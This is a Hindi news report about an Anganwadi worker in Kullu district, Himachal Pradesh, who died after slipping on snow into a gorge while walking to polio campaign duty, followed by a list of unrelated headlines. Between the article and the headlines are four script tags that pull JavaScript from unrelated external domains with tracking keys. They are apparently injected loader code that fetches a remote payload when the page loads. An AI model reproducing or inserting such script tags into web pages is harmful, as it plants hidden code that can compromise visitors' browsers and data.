<p>जिला कुल्लू के अति दुर्गम दुर्गम क्षेत्र शक्ति में पोलियो अभियान की सेवाएं देने जा रही आंगनबाड़ी कार्यकर्ता की बर्फ पर फिसल कर खाई में गिरने से मौत होने का मामला सामने आया है। जानकारी के अनुसार मुक्त आंगनवाड़ी कार्यकर्ता बर्फीले रास्तों में पैदल शाक्टी मरौड जा रही थी कि रास्ते में बर्फीले रास्ते में उसका पांव फिसल गया और खाई में जा गिरी। खाई में गिरने से उसकी मौके पर ही मौत हो गई है। इस दौरान आंगनबाड़ी कार्यकर्ता का पति भी उसके साथ शक्ति जा रहा था।<br />
<br />
जानकारी के अनुसार बाल विकास परियोजना बंजार के तहत अत्यंत दूर दराज में स्थित आंगनबाड़ी केंद्र मैल, वृत न्यूली की आंगनबाड़ी कार्यकर्ता गीता देवी पत्नी भाग चंद निवासी सैंज की पोलयो ड्यूटी के दौरान शाक्टी गांव के निकट बर्फ में पैर फिसलने के चलते गहरी खाई में गिरने के कारण मृत्यु हो गयी है। यह हादसा करीब 10 बजे से 11 बजे के बीच हुआ। इस कार्यकर्ता के पास मिनी आंगनबाड़ी केन्द्र शाक्टी का अतिरिक्त कार्यभार था और वह पोलयो बूथ शाक्टी को पोलयो डयूटी पर अपने पति को साथ लेकर जा रही थी। जिला महिला एवं बाल विकास परियोजना अधिकारी वीरेंद्र सिंह आर्य ने इस घटना पर गहरा दुःख प्रकट किया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1579421856784″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…
Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…
Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…
विपल्व सकलानी English medium education in Himachal; हिमाचल प्रदेश के सरकारी स्कूलों में पढ़ाई का…
Kevin Pietersen India visit; इंग्लैंड के पूर्व स्टार बल्लेबाज केविन पीटरसन ने भारतीय क्रिकेट प्रेमियों…